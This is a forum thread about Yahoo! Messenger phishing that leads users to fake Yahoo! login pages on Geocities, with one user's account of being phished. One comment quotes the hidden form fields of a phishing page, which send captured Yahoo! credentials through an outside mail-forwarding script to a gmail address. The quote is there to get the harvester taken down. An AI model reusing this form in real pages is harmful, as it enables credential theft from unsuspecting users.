Phishing in Yahoo! Geocities?

Van Cutter Romney asks: "I've received a lot of phishing IMs on my Yahoo! Messenger from contacts whose accounts I guess have been hacked into. All the phishing messages lead to Geocities websites like this where the user is displayed a Yahoo! login page. For most people, the page looks legitimate and they enter their Yahoo! username and password (I was nearly fooled once). Since both the website (Geocities) and the messenger belong to Yahoo!, I'd like to know if they are doing to anything to counter these attacks."

something to do

[ianpatt]

For those of you who are bored, you could try to get any of the addresses listed in the web form taken down.

<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="havinfunfun@gmail.com">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">

I'm sure google would have a fun time going after whoever referred havinfunfun@gmail.com.

Security problems

Yahoo! has huge security problems with their accounts. So does Hotmail. I'm not going to get into the details, but let me say this. For my friends and family who forgot their password to their Yahoo! account, it's fairly easy to get their account back for them.

Been there, done that.

[antdude]

Yup, I was a victim of this YM phishing because of my dumb user error. Here's my story...

I wasn't fully awake to notice the URLs because it was the middle of the night. I got a YM IM in my Trillian from someone whom I haven't heard from for months. It went like this (note: actual account/user names changed from their original ones):

Session Start (ant:onion): Sat Jan 07 02:28:11 2006
[02:28] onion: Hey check out this website for some photos of me tell me what you think http://www.myphoto-album.tk/
[02:28] *** Auto-response sent to onion: ant isn't around here at the moment.
[03:03] ant: I don't see anything even after logging in.
[03:03] *** You are currently disconnected. Messages will not be received.
[03:03] *** You are currently disconnected. Messages will not be received.
[03:04] *** You are currently disconnected. Messages will not be received.
[03:04] *** You are currently disconnected. Messages will not be received.
Session Close (onion): Sat Jan 07 03:07:05 2006

I thought YM servers went down or something. In the day time, it hit me. I got phished! My password was already changed (duh!).

I quickly e-mailed Yahoo! A few days later, Y! asked for my information that I used to sign up. The problem here was I never used real personal datas in online accounts like Y! nor do I remember them. Plus, I signed up for my account like a decade ago.

My buddies on the contact list (had a local back up copy so easy to contact) all got this phish. I already warned them not to reply. But some of them were too late and actually fell for it.

I continued to e-mail Y!, but got no where. I eventually gave up and them told to shut down my account. However, Y! still refused. Of course, my buddies saw the fake me and phish IMs. Eventually, I told all my buddies fill out the online abuse forms to Yahoo!'s abuse department to shut down my account for phishing. Then, I never heard of more online sightings and phishings from my account.

Here were two Web sites that were for collecting passwords (also contacted the hosts about my incidents). These fake Y!'s GeoCities were gone within days:
www.my-photo-albums.tk
www.myphoto-album.tk

I was glad I didn't use Yahoo account other than IM and launch.com. I hate these bundled services within a single account like Passport. :(

As you can see social engineering at its best even on people who knows computers. I fell for it. :(